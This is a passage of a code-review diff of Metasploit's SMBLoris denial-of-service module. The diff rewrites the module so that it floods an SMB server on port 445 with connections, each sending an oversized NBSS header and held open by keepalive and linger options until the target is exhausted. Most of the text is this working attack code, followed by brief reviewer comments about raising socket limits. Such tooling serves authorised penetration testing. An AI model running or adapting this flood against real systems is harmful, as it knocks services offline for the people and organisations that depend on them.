modules/auxiliary/dos/smb/smb_loris.rb

```diff
@@ -1,89 +1,95 @@
+    rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445},
+  }
+}
 
-        DISCALIMER: This module opens a lot of simultaneous connections. Please check
-        your system's ULIMIT to make sure it can handle it. This module will also run
-        continuously until stopped.
-      },
-      'Author'          =>
-        [
-          'thelightcosine'
-        ],
-      'License'         => MSF_LICENSE,
-      'References'      =>
-        [
-          [ 'URL', 'http://smbloris.com/' ]
-        ],
-      'DisclosureDate' => 'Jul 29 2017'
-    ))
+def run(args)
+  header = NbssHeader.new
+  header.message_length = 0x01FFFF
 
-    register_options(
-      [
-        Opt::RPORT(445)
-      ])
-  end
+  last_reported = 0
+  warned = false
+  n_loops = 0
+  sockets = []
 
-  def run
-    header = NbssHeader.new
-    header.message_length = 0x01FFFF
+  target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)
 
-    linger = Socket::Option.linger(true, 60)
+  Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "
 
-    while true do
-      sockets = {}
-      (1025..65535).each do |src_port|
-        print_status "Sending packet from Source Port: #{src_port}"
-        opts = {
-          'CPORT'           => src_port,
-          'ConnectTimeout'  => 360
-        }
+  while true do
+    begin
+      sockets.delete_if do |s|
+        s.closed?
+      end
 
-        if sockets[src_port]
-          disconnect(sockets[src_port])
-        end
+      nsock = target.connect(timeout: 360)
+      nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
+      nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
+      nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
+      nsock.setsockopt(Socket::Option.linger(true, 60))
+      nsock.write(header.to_binary_s)
+      sockets << nsock
 
-        begin
-          nsock = connect(false, opts)
-          nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
-          nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
-          nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
-          nsock.setsockopt(linger)
-          nsock.write(header.to_binary_s)
-          sockets[src_port] = nsock
-        rescue ::Exception => e
-          print_error "Exception sending packet: #{e.message}"
+      n_loops += 1
+      if  last_reported != sockets.length
+        if n_loops % 100 == 0
+          last_reported = sockets.length
+          Metasploit.log "#{sockets.length} socket(s) open", level: 'info'
         end
+      elsif n_loops % 1000 == 0
+        Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'
       end
+    rescue Interrupt
+      break
+      sockets.each &:close
+    rescue Errno::EMFILE
+      Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing you system limits.", level: 'warning' unless warned
```

Comment:
> Try rerouting auxiliary power to your system limits.

?

Reply:
Yeah, I guess we should direct the user to the module docs and provide help on raising the limits on various systems.

Reply:
Potential rabbit hole with all the containers there, but yeah, maybe even some scriptage generation to set em for popular OS'.